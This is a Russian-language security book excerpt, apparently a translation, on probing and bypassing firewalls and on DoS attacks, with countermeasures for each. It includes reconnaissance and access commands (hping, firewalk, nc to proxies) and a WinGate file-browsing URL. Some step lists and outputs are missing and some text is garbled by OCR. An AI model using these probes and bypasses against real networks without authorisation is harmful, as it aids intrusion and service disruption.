Война с брандмауэрами Не волнуйтесь, в данном разделе мы Не будем рассматривать чудодейственные способы вывода из строя действующих брандмауэров. Мы лишь познакомимся с несколькими приемами, которые позволяют собрать некоторую важную информацию о различных путях проникновения через брандмауэры и их обхода. Передача тестовых пакетов Утилита hping, написанная Сальватором Санфилиппо (Salvatore Sanfilippo), передает TCP-пакеты на порт назначения и сообщает о том, какие ответные пакеты были получены. В зависимости от многочисленных условий эта утилита предоставляет самые разнообразные сведения. Каждый отдельный пакет и все пакеты в целом способны предоставить довольно ясное представление об используемых на брандмауэрах списках управления доступом. Например, с помощью утилиты hping можно выявить открытые и заблокированные порты, а также потерянные и отвергнутые пакеты. [root]# hping 192.168.51.101 -с2 -S -р80 -n Теперь нам известен открытый порт на пути к желанной цели, однако мы еще ничего не знаем о брандмауэре. В следующем примере утилита hping сообщает о том. что с узла 192.168.70.2 ею получен ICMP-пакет типа 13 (Destination Unreachable — получатель недостижим). В главе 2 упоминалось, что такой пакет обычно передается маршрутизатором с фильтрацией пакетов типа Cisco IOS, на котором взаимодействие с определенными портами административно запрещено. [root]# hping 192.168.51.101 -с2 -S -p23 -n С этого момента наше предположение подтвердилось: узел 172.168.70.2, скорее всего, является брандмауэром. Кроме того, нам известно, что на нем явно блокируется порт 23. Другими словами, если узел представляет собой маршрутизатор Cisco, то в его конфигурационном файле наверняка имеется следующая строка. access-list 101 deny tcp any any 23!telnet В приведенном ниже примере мы получили ответный пакет RST/ACK, что свидетельствует о выполнении одного из двух возможных условий: (1) пакет прошел через брандмауэр и на целевом узле заданный порт не находится в состоянии ожидания запросов или (2) брандмауэр отверг пакет (что вполне возможно, если на брандмауэре Checkpoint действует правило REJECT). [root]# hping 192.168.50.3 -с2 -S -p22 -n Поскольку ранее был получен ICMP-пакет типа 13, можно сделать вывод о том, что брандмауэр (192.168.70.2) позволяет пакетам проходить дальше по маршруту, однако на целевом узле опрашиваемый порт не находится в состоянии ожидания запросов. [root]# hping 192.168.50.3 -с2 -S -p22 -n Такой результат утилита hping может предоставить по двум причинам: (1) пакет не смог достичь источника назначения и был утерян в процессе передачи или (2) наиболее вероятно, пакет был отброшен устройством (возможно, брандмауэром — 192 .168. 70.2) в соответствии с установленными правилами ACL. Контрмеры: защита от тестовых пакетов Предотвращение Предотвратить атаки с использованием утилиты hping очень трудно. Лучше всего просто заблокировать передачу сообщений ICMP с типом 13 (как описано в разделе, посвященному утилите nmap). Утилита firewalk Утилита firewalk является небольшим прекрасным средством, которое, подобно программам-сканнерам, позволяет исследовать порты узлов, расположенных позади брандмауэра. Она написана Майком Шифманом (Mike Schiffman) и Дэйвом Гольдсмитом (Dave Goldsmith). С помощью этой утилиты можно просканировать такие узлы и получить установленные на них правила. Причем вся процедура выполняется без реального "прикосновения" к целевой системе. [root]# firewalk -pTCP -S135-140 10.22.3.1 Относительно утилиты firewalk необходимо упомянуть об одной проблеме, которая заключается в том, что ее результаты могут оказаться непредсказуемыми. Некоторые брандмауэры способны выявить истечение времени жизни пакета до проверки своего списка ACL, что приводит к передаче ответного ICMP-сообшения TTL EXPIRED в любом случае. В результате утилитой firewalk все порты будут считаться открытыми. Контрмеры: защита от утилиты firewalk Предотвращение На уровне внешнего интерфейса можно заблокировать передачу ICMP-пакетов TTL EXPIRED, однако это может отрицательно сказаться на производительности, поскольку легитимные клиенты никогда не смогут узнать, что же произошло с их соединением. Сканирование с исходного порта Традиционные брандмауэры с фильтрацией пакетов типа IOS Cisco имеют один существенный недостаток: они не сохраняют состояние! Для большинства читателей этот факт выглядит вполне очевидным, не так ли? Однако проанализируйте его еше раз. Если брандмауэр не может поддерживать состояние, то он не может определить, с внутренней или с внешней стороны было установлено соединение. Другими словами, такие брандмауэры не могут полностью управлять некоторыми потоками данных. Как следствие, в качестве исходного можно задать порт, который обычно является "легитимным", например TCP 53 (перенос зоны) и TCP 20 (FTP), а затем для получения ценной информации приступить к сканированию (или к атаке). Если обнаружится, что брандмауэр не сохраняет состояние соединений, то можно воспользоваться этим преимуществом и приступить к атаке уязвимых узлов, расположенных за этим брандмауэром. С помощью модифицированной утилиты перенаправления портов, например Fpipe от группы Foundstone, можно задать исходный порт 20, а затем приступить к атаке целевого узла через брандмауэр. Контрмеры: защита и сканирования с исходного порта Предотвращение Решить описанную проблему очень просто, однако это решение выглядит не очень эффектным. Необходимо запретить любые сетевые взаимодействия, для которых требуется комбинация из нескольких портов (FTP), либо перейти к промежуточным программным брандмауэрам или тем, которые сохраняют состояние соединений. При этом можно значительно повысить управляемость входящими и исходящими соединениями, а также реально контролировать весь процесс. |
Фильтрация пакетов Работа брандмауэров с фильтрацией пакетов (в том числе с сохранением состояний) типа Firewall-1 от компании CheckPoint, PIX и IOS от компании Cisco (да, IOS тоже можно использовать в качестве брандмауэра) основывается на списках ACL или правилах, служащих для определения того, является ли авторизованным трафик, передаваемый в/из внутренней сети. В большинстве случаев эти списки грамотно разработаны и их очень трудно обойти. Однако зачастую можно обойти брандмауэры с нестрогим списком ACL и передать отдельные пакеты во внутреннюю сеть. Нестрогие списки ACL Нестрогие списки ACL применяются на гораздо большем числе брандмауэров, чем это можно себе представить. Предположим, что провайдеру услуг Internet какой-то организации необходимо разрешить перенос зоны. В этом случае вместо нестрогого списка ACL, такого как "Разрешить выполнение действий с сервера DNS провайдера услуг Internet с исходного TCP-порта 53 и порта назначения 53", может быть реализован следующий: "Разрешить выполнение любых действий с исходного TCP-порта 53". Подобные ошибки в конфигурации могут оказаться поистине разрушительными, поскольку злоумышленник сможет просканировать всю сеть извне. Большинство из таких атак начинается со сканирования узла, расположенного позади брандмауэра, и использования в качестве исходного ложного TCP-порта 53 (DNS). Контрмеры против нестрогих списков ACL Предотвращение Удостоверьтесь, что правила вашего брандмауэра разрешают лишь определенные подключения. Например, если вашему провайдеру услуг Internet требуется выполнять перенос зоны, это должно быть явно указано в установленных правилах. При этом требуйте указания в правиле как исходного IP-адреса, так и IP-адреса назначения (внутреннего сервера DNS).
Обход брандмауэров Checkpoint Брандмауэры Checkpoint 3.0 и 4.0 предоставляют открытые порты по умолчанию. Порты, используемые для обратного поиска DNS (UDP 53), переноса зоны DNS (TCP 53) и маршрутизации (RIP, UDP 520), могут задействоваться любьш узлом для доступа к любому узлу. В дополнение ко всему эти операции не регистрируются в системных журналах. В результате после "захвата" узла внутренней сети у взломщика появляются интересные возможности.
Контрмеры: защита от обхода брандмауэров CheckPoint Предотвращение В зависимости от требований к конфигурации можно запретить большую часть трафика, разрешенного по умолчанию. При этом необходимо соблюдайте осторожность, поскольку можно случайно запретить и передачу авторизованных данных. Для ограничения доступа выполните следующие действия. Туннелирование трафика ICMP и UDP Туннелирование трафика ICMP — это возможность инкапсуляции реальных данных в заголовке пакета ICMP. Против такой атаки бессильны многие маршрутизаторы, разрешающие прохождение ICMP-пакетов ECHO, ECHO REPLY и UDP-пакетов. Подобно ситуации с брандмауэром CheckPoint, связанной с передачей данных DNS, возможность использования туннелирования трафика ICMP и UDP базируется на том, что в распоряжении взломщика уже имеется взломанный узел, находящийся позади брандмауэра. Контрмеры: защита от туннелирования трафика ICMP и UDP Предотвращение Для зашиты от атак такого типа можно полностью запретить доступ по протоколу 1СМР через брандмауэр или обеспечить управляемую избирательную передачу ICMP-пакетов. Например, следующий список ACL брандмауэров Cisco позволит полностью запретить передачу административных данных ICMP за пределы подсети 172.29.10.0 (демилитаризованной зоны). access-list 101 permit icmp any 172.29.10.0 0.255.255.255 8! Если ваш провайдер услуг Internet отслеживает работоспособность компьютеров, расположенных позади брандмауэра, с помощью утилиты ping (чего мы не советуем делать), то такие списки ACL нарушат этот процесс. Уточните у своего провайдера, применяет ли он эту утилиту. |
Изъяны программных посредников Вообще, уязвимость программных посредников не очень высока. После зашиты самого брандмауэра и реализации надежных правил, используемых программным посредником, вероятность обхода брандмауэра будет значительно ниже. Однако, как и следует ожидать, зачастую брандмауэр оказывается настроен неправильно. Имя узла: localhost Ранние программные посредники системы UNIX не заботились о необходимости ограничения локального доступа. Несмотря на контроль пользователей, использующих Internet, было вполне возможно, чтобы внутренний пользователь мог получить локальный доступ к самому брандмауэру. Несомненно, при использовании такой атаки требуется знание корректного имени пользователя или пароля, используемых на брандмауэре. Однако вы очень удивитесь после того, как узнаете, насколько легко их подобрать в некоторых случаях. Для того чтобы проверить, уязвим ли ваш программный посредник подобным атакам, выполните следующие действия. С:\> nc -v -n 192.168.51.129 23 1. Введите localhost. Контрмеры: защита от использования имени localhost Предотвращение Способ устранения ошибок в конфигурации во многом зависит от типа используемого брандмауэра. В любом случае можно реализовать правило, ограничивающее возможность доступа с определенных узлов. Конечно, лучше всего вообще запретить регистрацию с использованием имени localhost. Однако если это все же необходимо, установите TCP-оболочку, с помощью которой можно разрешить соединение лишь узлам с определенными IP-адресами. Неавторизованный внешний доступ к программному посреднику Такой подход наиболее пригоден для доступа к брандмауэрам, реализующим прозрачные функции, однако мы довольно часто сталкиваемся с его использованием. Администратор может уделить самое пристальное внимание обеспечению безопасности брандмауэра и установить строгие правила доступа, однако в то же время забыть о необходимости блокирования доступа извне. В этом случае сразу же возникнет два типа опасности: (1) взломщик может воспользоваться proxy-сервером для атак на всевозможные узлы Internet, активно применяя изъяны сценариев CG1 и различные методы мошенничества в Web, и (2) с помощью средств Web злоумышленник сможет получить доступ к вашей интрасети. Нам приходилось встречать подобным образом сконфигурированные брандмауэры и каждый раз мы могли получить доступ ко всей корпоративной интрасети. Контрмеры: защита от неавторизованного внешнего доступа к программному посреднику Предотвращение Для того чтобы предотвратить такую атаку, нужно запретить доступ к программному посреднику со стороны внешнего интерфейса брандмауэра. Поскольку конкретный алгоритм решения этой задачи сильно зависит от производителя, свяжитесь с ним для получения более подробной дополнительной информации. |
Изъяны WinGate Известно, что популярный программный брандмауэр WinGate систем Windows 95/NT (http://wingate.deerfield.com/) обладает несколькими уязвимыми местами. Большинство из них связано со значениями параметров, установленными по умолчанию, разрешающими неавторизованное использование служб telnet, SOCKS и Web. Хотя доступ к этим службам можно ограничить на уровне отдельных пользователей (и интерфейсов), в большинстве случаев установка и использование этого программного пакета выполняется без учета каких бы то ни было требований к защите. Список серверов WinGate можно найти на узле группы энтузиастов CyberArmy по адресу http://www.cyberarmy.com/wingate/. Неавторизованный просмотр Как и многие другие неправильно сконфигурированные программные посредники, определенные версии брандмауэра WinGate (в частности, 2.1 для NT) позволяют внешним пользователям абсолютно анонимно просматривать Internet. Такая возможность оказывается чрезвычайно важной для взломщиков, нацеленных на "захват" приложений Web-сервера, поскольку ею содержимое можно получить без риска быть пойманным. Защититься от Web-атак очень сложно, поскольку весь трафик туннелируется и направляется на порт 80. Более подробно хакинг Web рассматривается в главе 15. Контрмеры: защита от неавторизованного просмотра Предотвращение Для того чтобы нейтрализовать описанный изъян сервера WinGate, нужно просто ограничить привязку определенных служб. Для ограничения использования служб proxy-сервера на многоадаптерном (multihomed) узле выполните следующие действия. [root]* telnet 172.29.11.191 2. После появления на экране приведенного выше текста введите адрес узла для подключения. Connecting to host 10.50.21.5...Connected
Контрмеры: защита от неавторизованного доступа к службе telnet Предотвращение В данном случае можно воспользоваться теми же рекомендациями, что приведены в разделе " Контрмеры: Защита От Неавторизованного Просмотра". Для устранения проблемы просто ограничьте привязку определенных служб сервера WinGate. На многоадаптерном узле выполните для этого следующие действия. Просмотр файлов Согласно одной из статей бюллетеня Digital Security Advisory сервер WinGate 3.0 через порт управления 8010 позволяет любому пользователю просматривать файлы системы. Для того чтобы проверить, уязвима ли ваша система, выполните следующие инструкции. http://192.168.51.101:8010/c:/ Если система уязвима, то вы сможете просмотреть каждый файл каталога, а также перемещаться по иерархии каталогов по своему усмотрению. Такая возможность чрезвычайно опасна, поскольку некоторые приложения хранят имена пользователей и пороли в виде незашифрованного текста. Например, если для удаленного управления серверами на вашем компьютере установлены программы Remotely Possible или ControlIT компании Computer Associates, то имена пользователей и пароли, используемые при аутентификации, хранятся либо в незашифрованном виде, либо в форме, которую не составляет труда расшифровать (см. главу 13). Контрмеры: предотвращение просмотра файлов Для текущей версии сервера WinGate в настоящее время нет модуля обновления, позволяющего устранить проблему просмотра файлов. Для получения более подробной информации о доступных модулях обновления обратитесь на соответствующий узле поддержки по адресу http: /wingate.deerfield.com/helpdesk/. |
Резюме На самом деле правильно сконфигурированный брандмауэр оказывается чрезвычайно хорошо защищенным. Однако при использовании средств сбора информации, таких как утилиты traceroute, hping и nmap, взломщики могут исследовать потенциальные пути прохождения маршрутизатора и брандмауэра, а также определить их тип (или как минимум сделать на этот счет определенные предположения). Большинство из известных в настоящее время изъянов связано с неправильной настройкой брандмауэра или недостаточным вниманием к его администрированию. Использование взломщиком любого из них может привести к настоящей катастрофе. |
Глава 12. АТАКИ DOS
|
Атаки DoS Взрыв и медленно рассеивающееся облако. Нет, сейчас речь пойдет не о детском безалкогольном напитке. Мы познакомимся с различными средствами, которыми пользуются взломщики. В последние годы их применение приводит к опустошительному хаосу в Internet. Ежегодно атаки DoS (Denial of Service — отказ в обслуживании) стоят различным компаниям миллионы долларов и таят в себе серьезную угрозу для любой системы или сети. Все эти убытки обусловлены длительным простоем системы, упущенным доходом и большим объемом работ по идентификации и подготовке адекватных ответных мер. По существу, атака DoS нарушает или полностью блокирует обслуживание легитимных пользователей, сетей, систем или других ресурсов. Цель любой из таких атак обычно не имеет ничего общего с благими намерениями, и ее достижение зачастую не требует высокой квалификации, поскольку все необходимые средства абсолютно доступны. |
Причины использования атак DoS На протяжении этой книги обсуждались и демонстрировались многочисленные средства и приемы, используемые взломщиками для нарушения системы защиты различных систем. Зачастую политика обеспечения безопасности, реализованная в целевой системе или сети, способна предотвратить проникновение неквалифицированных злоумышленников. Ощущая свое бессилие, взломщик может прибегнуть к последнему средству — атаке DoS. |
Типы атак DoS Зачастую гораздо проще нарушить функционирование сети или системы, чем на самом деле получить к ней доступ. Сетевые протоколы типа TCP/IP были разработаны для применения в открытом и доверенном сообществе пользователей, и его текущая версия 4 унаследовала все слабые места своих предшественников. Кроме того, многие операционные системы и сетевые устройства имеют различные изъяны в используемой реализации сетевого стека, что значительно снижает их способность противостоять атакам DoS. Мы были свидетелями, как на устройствах управления различными процессами, в которых использовался устаревший стек протокола IP, сбой происходил от простого перенаправления ICMP с некорректным параметром. Поскольку существует много средств для реализации атак DoS, очень важно идентифицировать их типы, а также разобраться с тем, как выявить и предотвратить эти атаки. Сначала мы познакомимся с теорией, лежащей в основе четырех стандартных типов атак DoS. |
Насыщение полосы пропускания Наиболее коварной формой атак DoS является насыщение полосы пропускания (bandwidth consumption). По существу, взломщики могут заполнить всю доступную полосу пропускания определенной сети. Это можно осуществить и в локальной сети, однако чаще всего злоумышленники захватывают ресурсы удаленно. Для реализации такой атаки можно воспользоваться двумя сценариями. Сценарий 1 Взломщик может насытить сетевое подключение целевой системы, воспользовавшись более широкой полосой пропускания. Такой сценарий вполне возможен, если злоумышленник обладает сетевым подключением Т1 (1.544 Мбит/с) или более быстрым, и лавинно заполняет сетевое соединение с полосой пропускания 56 или 128 Кбит/с. Это эквивалентно столкновению трактора-тягача с автомобилем Yugo: большее транспортное средство, или в данном случае канал, наверняка станет победителем в этой битве. Этот тип атак не ограничивается возможностью применения к низкоскоростным сетевым соединениям. Нам встречались ситуации, когда взломщики получали доступ к сетям с полосой пропускания более 100 Мбит/с. Для атаки на Web-узел и насыщения его канала взломщику достаточно иметь канал Т1. Сценарий 2 Взломщики усиливают атаку DoS, вовлекая в процесс насыщения целевого сетевого соединения несколько узлов. Воспользовавшись таким подходом, сеть с доступом ТЗ (45 Мбит/с) можно насытить с помощью канала связи 56 Кбит/с. Благодаря чему это возможно? Используя другие узлы для усиления атаки DoS, взломщик с помощью ограниченной полосы пропускания может насытить полосу пропускания 100 Мбит/с. Для того чтобы успешно реализовать эту возможность, взломщик должен привлечь дополнительные узлы. Как вы увидите ниже в данной главе, в некоторых случаях осуществить усиление атаки гораздо проще, чем может показаться на первый взгляд. |
Недостаток ресурсов Атака, приводящая к недостатку ресурсов (resource starvation), отличается от предыдущей атаки тем, что она направлена на захват системных ресурсов, таких как центральный процессор, память, дисковые квоты или другие системные процессы. Зачастую взломщик обладает легитимным доступом к ограниченному количеству системных ресурсов. Однако он предпринимает попытку захватить и дополнительные ресурсы. Таким образом, система или законные пользователи будут испытывать недостаток в совместно используемых ресурсах. Атаки такого типа обычно приводят к недоступности ресурса, и, следовательно, к краху системы, переполнению файловой системы или зависанию процессов. |
Ошибки программирования Ошибки программирования (programming flaw) заключаются в неспособности приложения, операционной системы или логической микросхемы обрабатывать исключительные ситуации. Обычно эти ситуации возникают при передаче уязвимому элементу несанкционированных данных. Взломщики будут много раз передавать пакеты, в которых не учитываются рекомендации документов RFC, чтобы определить, способен ли сетевой стек справиться с этими исключениями или это приведет к панике ядра (kernel panic) или краху всей системы. Для определенных приложений, которым требуются пользовательские входные данные, взломщики будут передавать строковые данные длиной в тысячи строк. Если программой используется буфер фиксированной длины, скажем, 128 байт, то злоумышленники попробуют сгенерировать условие переполнения буфера и вызвать крах приложения. Что еще хуже, взломщики могут также выполнить привилегированные команды, как описывалось в главах 5 и 7. Ошибки программирования часто встречаются и в логических микросхемах. Печально известная атака под названием Pentium f00f основывается на том, что пользовательский процесс, выполнив некорректную инструкцию 0xf 00f c7c8, приведет к краху любой операционной системы. |
Маршрутизация и атаки DNS Такие атаки DoS основываются на манипуляции записями таблицы маршрутизации, что приводит к прекращению обслуживания легитимных систем или сетей. Большинство протоколов маршрутизации, такие как RIP версии 1 (Routing Information Protocol) и ВОР (Border Gateway Protocol), не имеют вообще или используют слабые алгоритмы аутентификации. Это предоставляет взломщикам прекрасную возможность изменять маршруты, зачастую указывая ложный исходный IP-адрес и вызывая состояние отказа в обслуживании. В результате таких атак трафик целевой сети маршрутизируется через сеть взломщика или в черную дыру, т.е. в никуда — в сеть, которой не существует.
|
Общие атаки DoS Некоторые атаки DoS можно использовать для нескольких типов систем. Мы будем называть такие атаки общими (generic). В основном общие атаки направлены на насыщение полосы пропускания или захват ресурсов. Стандартным элементом атак этого типа является манипулирование протоколами. При использовании протокола ICMP одновременно можно воздействовать на несколько систем. Например, взлом-шик может воспользоваться "почтовой бомбой" и отправить тысячи почтовых сообщений целевой системе, чтобы насытить полосу пропускания и истощить ресурсы почтового сервера. Хотя вирус Melissa не планировалось использовать в качестве средства генерации атаки DoS, однако на гребне лавины почтовых сообщений он может привести к краху почтового сервера. Его саморепликация оказалась настолько успешной, что из-за недостатка ресурсов почтовые серверы просто завершают свою работу. Атака Smurf Атака Smurf — это одна из наиболее опасных атак DoS, поскольку при ее реализации на целевые узлы осуществляется усиленное воздействие. Эффект усиления возникает из-за рассылки направленных широковещательных ping-запросов на узлы сети, которые должны сгенерировать ответные сообщения. Направленный широковещательный запрос может передаваться либо на сетевой адрес, либо на сетевой широковещательный адрес, однако в любом случае требуется устройство, выполняющее преобразование данных уровня 3 (IP) к уровню 2 (сеть). (Более подробную информацию по этому вопросу можно получить в документе RFC 1812, Requirements for IP Version 4 Routers.) Если предполагается, что сеть принадлежит к классу С, то сетевым адресом будет .0, а широковещательным адресом — .255. Направленные широковещательные запросы обычно используются для диагностики, позволяя выявить функционирующие узлы без использования утилиты ping отдельно для каждого адреса используемого диапазона. Контрмеры: защита от атак Smurf Для того чтобы предотвратить возможность использования вашей сети (компьютера) для усиления, запретите прохождение направленных широковещательных запросов на пограничном маршрутизаторе. На маршрутизаторах Cisco для этого можно воспользоваться командой no ip directed-broadcast. На устройствах Cisco IOS версии 12 этот режим включен по умолчанию. При использовании других устройств обратитесь к документации, входящей в комплект поставки. Системы Solaris 2.6, 2.5.1, 2.5, 2.4 и 2.3 Чтобы предотвратить генерацию ответных сообщений на запросы ECHO в системах Solaris, добавьте в файл /etc/rc2 .d/S69inet следующую строку, ndd -set /dev/ip ip_respond_to_echo_broadcast 0 Linux Для того чтобы обеспечить такую же защиту в системе Linux, необходимо активизировать функции брандмауэра на уровне ядра с помощью утилиты ipfw. Убедитесь, что эти требования учтены при компиляции ядра и выполните следующие команды ipfwadm -I -a deny -Р icmp -D 10.10.10.0 -S О/О 0 8 При этом не забудьте заменить строку 10.10.10.0 своим сетевым адресом, а 10.10.10.255 — сетевым широковещательным адресом. FreeBSD Система FreeBSD версии 2.2.5 и выше запрещает обработку направленных широковещательных запросов по умолчанию. Этот режим можно активизировать или отключить, изменив параметр sysctl в файле net. inet. icmp. bmcastecho. AIX Система AIX 4.x запрещает генерировать ответные сообщения на широковещательные запросы по умолчанию. Для переключения этого режима можно воспользоваться командой по с параметром bcastping. Эта команда служит для настройки сетевых атрибутов в выполняющемся ядре. Данные атрибуты должны устанавливаться при каждом запуске системы. Все версии системы UNIX Для того чтобы предотвратить генерацию узлами сообщений в ответ на атаку Fraggle, отключите службы echo и chargen в файле /etc/inetd/conf, поместив в начало соответствующих строк символ #. |
Узлы под воздействием атак Конечно, очень важно понимать, как предотвратить возможность использования узла в качестве усилителя атаки, однако еще важнее разобраться в том, как определить, что узел уже используется для этих целей. Как упоминалось в предыдущих главах, нужно ограничить возможность поступления данных ICMP и UDP лишь заданных типов и только на требуемые узлы. Причем это нужно обеспечить на пограничных маршрутизаторах. Естественно, такая мера не позволит защититься от атак Smurf и Fraggle, приводящих к насыщению полосы пропускания. Гораздо лучше обратиться к провайдеру услуг Internet и совместными усилиями максимально ограничить входящий трафик ICMP. Эти защитные меры можно усилить с помощью режима CAR (Committed Access Rate — допустимая частота обращений), который можно установить на устройствах Cisco IOS 1.1СС, 11.ICE и 12.0. Это позволит ограничить трафик ICMP некоторой разумной величиной, например 256 или 512 Кбайт. Атака с помощью переполнения пакетами SYN До того как атака Smurf не стала такой популярной, наиболее разрушительной считалась атака с помощью переполнения пакетами SYN. Упоминавшаяся в начале этой главы атака на компанию PANIX является прекрасным примером реализации такой атаки. Давайте подробно разберемся с тем, что же происходит в этом случае. В обычной ситуации пакет SYN отсылается с определенного порта системы А на конкретный порт системы в, который находится в состоянии LISTEN. В этот момент потенциальное соединение системы в находится в состоянии SYN_RECV. На этой стадии система в передает системе А пакет SYN/ACK. Если процесс проходит нормально, система А передает обратно пакет АСК и соединение переходит в состояние ESTABLISHED. Контрмеры: защита от атак с использованием пакетов SYN Чтобы определить, подвержена ли атаке ваша система, можно воспользоваться командой netstat, если она поддерживается операционной системой. Многочисленные соединения в состоянии SYN_RECV свидетельствуют о том, что именно в этот момент проводится атака. Увеличение размера очереди на установку соединений Несмотря на то что стек протокола IP каждым производителем реализуется по-своему, вполне возможно настроить размер очереди на установку соединений таким образом, чтобы нейтрализовать воздействие атаки с использованием пакетов SYN. Это полезное, однако не самое оптимальное решение, поскольку его реализация требует дополнительных системных ресурсов, а это может сказаться на общей производительности. Уменьшение периода ожидания установки соединения Сокращение интервала ожидания установки соединения также поможет снизить влияние атаки. Тем не менее, это тоже не самое оптимальное решение проблемы. Использование пакетов обновления программного обеспечения и защита от потенциальных атак SYN Как следует из названия подраздела, большинство современных операционных систем имеет встроенные механизмы выявления и предотвращения атак с использованием пакетов SYN. Для получения перечня таких операционных систем и соответствующих модулей обновления читайте отчет СА-96:21 группы CERT TCP SYN Flooding and IP Spoofing Attacks. Использование сетевых систем IDS Некоторые системы IDS уровня сети могут обнаруживать и активно противодействовать атакам SYN. Такие атаки можно обнаружить по возросшему потоку пакетов SYN, который не сопровождается потоком ответных сообщений. Система выявления вторжений может передать системе, используемой в процессе атаки, пакет RST, соответствующий начальному запросу SYN. Это будет способствовать восстановлению корректного состояния очереди на установку соединений. Атаки DNS В 1997 году группа специалистов по вопросам безопасности Secure Networks, Inc. (SNI), которая в настоящее время называется Network Associates, Inc. (NAI), опубликовала отчет о различных изъянах реализации BIND (Berkeley Internet Name Domain) системы DNS (NAI-0011, BIND Vulnerabilities and Solutions). Версии BIND до 4.9.5.+Р1 могут кэшировать фиктивную информацию, если активизирован режим рекурсии. Этот режим позволяет серверу имен обрабатывать запросы на получение данных о зонах и доменах, которые он не обслуживает. Когда серверу имен приходит запрос на получение информации о неизвестной зоне или домене, он перенаправляет запрос авторизованному серверу имен этого домена. После получения ответа от этого сервера первый сервер имен передает полученные данные обратно узлу, сгенерировавшему запрос. Контрмеры: защита службыDNS Для разрешения проблем службы BIND обновите ее версию до 4.9.6 или 8.1.1 и выше. Поскольку изъян многих версий BIND связан с возможностью повреждения буфера, лучше всего обновить ее используемую версию до самой последней, в которой реализованы дополнительные средства зашиты. Для получения более подробной информации по этому вопросу обращайтесь по адресу http://www.isc.org/bind.html. Информацию о модулях обновления можно найти в отчете СА-97.22 BIND — the Berkeley Internet Name Daemon. |
Атаки DoS систем UNIX и Windows NT Последние двадцать лет популярность системы UNIX неустанно возрастает. И это абсолютно закономерно, поскольку эта система обладает мощью, элегантностью и позволяет выполнять самые невероятные задачи. В то же время эти же преимущества иногда могут послужить причиной возникновения некоторых проблем. В течение многих лет были выявлены сотни условий DoS в различных версиях системы UNIX. |
Удаленные атаки DoS В настоящее время большинство условий DoS связано с ошибками в программировании, которые имеют отношение к реализации стека IP различными разработчиками. Как упоминалось в главе 2, каждый разработчик реализует стек IP по-разному. Поскольку реализация стека является достаточно сложной задачей, решение которой постоянно эволюционирует, то всегда имеется большая вероятность появления самых разнообразных ошибок. В основе многих атак лежит возможность передачи пакета или последовательности пакетов на целевой узел и использование определенного изъяна программного обеспечения. После того как эти пакеты будут получены целевой системой, могут возникать самые различные ситуации, начиная с некорректной обработки поступивших пакетов до краха всей системы в целом. Перекрытие фрагментов пакетов IP Эти атаки связаны с изъянами в программном коде определенной реализации стека IP, который используется для восстановления пакетов. Когда пакеты проходят через различные сети, может оказаться необходимым разделить эти пакеты на меньшие части (фрагменты), размер которых определяется заданным в сети значением MTU (Maximum Transmission unit — максимальная единица передачи). Такая атака была характерна для старых версий ядра системы Linux, в котором некорректно обрабатывались перекрывающиеся IP-фрагменты. Хотя ядро Linux и следит за тем, чтобы фрагменты не превышали максимально допустимого размера, такая проверка не выполняется для слишком малых фрагментов. Таким образом, тщательно сконструированные пакеты после их отправки системе Linux могут привести к ее перезагрузке или останову функционирования. Linux является далеко не единственной системой, которая уязвима для таких атак. Системы Windows NT/95 также могут подвергаться подобным нападениям (newtear.c, syndrop.c, boink.c). Контрмеры Ошибки, используемые в описанных выше атаках, были исправлены в более поздних версиях ядра 2.0.x и 2.2.x. Для обеспечения защиты обновите ядро операционной системы до версии 2.0.x или 2.2.x. В этих версиях исправлен не только алгоритм восстановления фрагментов IP-пакетов, но и многие другие ошибки подсистемы защиты. Утечка памяти в Windows NT -именованные каналы поверх RPC В системе Windows NT возможна утечка памяти, управляемой файлом spoolss.exe, позволяющая неавторизованному пользователю подсоединиться к ресурсу \\server\ PIPEXSPOOLSS и захватить всю доступную память целевой системы. Ситуация усугубляется еще и тем, что эту атаку можно реализовать через нулевое соединение даже в том случае, когда в системном реестре установлено значение RestrictAnonymous. Для полного и скрытого захвата всех ресурсов может потребоваться некоторое время, поэтому деятельность вхтомшика может оказаться довольно продолжительной. Контрмеры: предотвращение утечки памяти Для предотвращения этой атаки через нулевое соединение нужно удалить параметр SPOOLSS, расположенный в поддереве системного реестра HKLM\System\CCS\ Services\LanmanServer\ Parameters\NullSessionPipes (REG_MULTI_SZ). Однако не забывайте, что эта мера не позволит обезопасить систему от проведения атаки авторизованными пользователями. Переполнение буфера в FTP-сервере IIS Как вы узнали из главы 8, атаки с использованием переполнения буфера чрезвычайно эффективны при нарушении зашиты уязвимых систем. Кроме того, переполнение буфера оказывается эффективным также для создания условия DoS. Если в результате переполнения буфера не удалось получить привилегии администратора, то в большинстве случаев его можно использовать для того, чтобы удаленно вызвать крах уязвимого приложения. Контрмеры: защита от переполнения буфера в RP-сервере IIS Описанную проблему позволяют устранить сервисный пакет SP5 и модули обновления, выпушенные компанией Microsoft после появления сервисного пакета SP4 Атаки stream и raped Программа stream, с (неизвестного автора) и raped.с, написанная Ликвидом Стилом (Liquid Steel), появились в начале 2000 года. С их использованием можно осуществить две похожие друг На друга простые атаки, которые, несмотря на это, будут очень эффективными.
Контрмеры: защита от атак stream и raped К сожалению, для защиты от таких атак модули обновления выпущены лишь для некоторых операционных систем. Нам неизвестно о каких-либо модулях обновления Windows NT. Однако в системе FreeBSD можно воспользоваться неофициальным модулем, который можно получить по адресу http: //www. freebsd.org/~alfred/tcp_fix.diff. Атака на сервер ColdFusion Эта атака была исследована в июне 2000 года компанией Foundstone. Она основана на ошибке программы и позволяет нарушить функционирование сервера. Условие DoS возникает в процессе конвертирования введенного и хранящегося паролей в форму, пригодную для их сравнения, когда введенный пароль имеет очень большой размер (более 40000 символов). Воспользоваться этим приемом очень просто. Для получения более подробной информации читайте главу 15. Контрмеры Подробные рекомендации по устранению этого изъяна приведены в главе 15, "Хакинг в Web". |
Распределенные атаки DoS В сентябре 1999 года в момент появления первого издания этой книги концепция распределенных атак DoS была не более чем предположением. А сейчас разговор о компьютерах без упоминания фразы "распределенная атака DoS" (DDoS — Distributed Denial of Service) можно считать неполным. Как и вирусы, появляющиеся в Internet как сорная трава, атаки DDoS привлекают все большее внимание средств массовой информации.
